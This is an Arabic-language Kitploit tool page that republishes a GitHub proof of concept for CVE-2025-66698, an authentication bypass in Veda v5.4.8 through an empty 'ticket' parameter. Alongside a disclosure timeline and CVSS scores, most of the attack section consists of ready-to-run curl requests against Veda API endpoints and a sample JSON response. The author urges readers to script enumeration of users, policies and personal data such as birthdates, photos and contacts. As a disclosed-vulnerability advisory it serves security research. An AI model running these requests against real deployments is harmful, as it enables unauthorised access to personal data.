Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/perunchess/cve-2025-66698
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالمصادقة
GitHubperunchess/cve-2025-66698

CVE-2025-66698

إثبات المفهوم لـ CVE-2025-66698: تجاوز المصادقة في Veda v5.4.8 عبر معلمة تذكرة فارغة، مما يتيح تعداد المستخدمين والسياسات والمعلومات الشخصية عبر نقاط نهاية API بدون مصادقة.

عرض المستودع
10منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-66698

البرنامج المستهدف: Veda (Semantic Machines) الإصدار v5.4.8 (على الأرجح جميع الإصدارات السابقة). نوع الثغرة: تجاوز المصادقة. معرف CVE: CVE-2025-66698. الملخص: يتحقق النظام بشكل غير صحيح من معامل التذكرة، حيث يتعامل مع السلسلة الفارغة كجلسة صالحة. رابط المشروع: Veda (Semantic Machines)

18 نوفمبر 2025: الاكتشاف وطلب CVE الأولي. 9 يناير 2026: تم تعيين معرف CVE. تمت محاولة التواصل مع البائع (تم تجاهله وحذفه). 13 يناير 2026: الإفصاح العام بسبب عدم استجابة البائع.

تم العثور على هذه الثغرة أثناء بحثي الأمني عند مراجعة الكود. معامل التذكرة في الكود لا يتحقق من القيمة الفارغة.

بعض نقاط نهاية API المتأثرة:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (تُرجع "true")

هناك العديد من المستخدمين الافتراضيين الذين يمكنك تعدادهم، ويمكنك أيضًا تغيير المخطط: من cfg إلى v-s وغيرها لتعداد المستخدمين والسياسات والمعلومات الشخصية (الأسماء الكاملة والصور الفوتوغرافية والمسميات الوظيفية وتواريخ الميلاد ومعلومات الاتصال) وغيرها.

curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

كل ما عليك فعله هو إيجاد المزيد والمزيد من هذه الكيانات "xxx:xxx" (cfg:xxx، v-s:xxx وغيرها). يمكنك كتابة سكربت bash بسيط لهذا الغرض. هناك أيضًا systicket مثبّت في الكود لتحقيق نفس النتيجة.

تقييم CVSS:

  • متجه CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N النتيجة: 8.6 (عالية)
  • متجه CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N النتيجة: 9.3 (حرجة)
تنزيل الأداة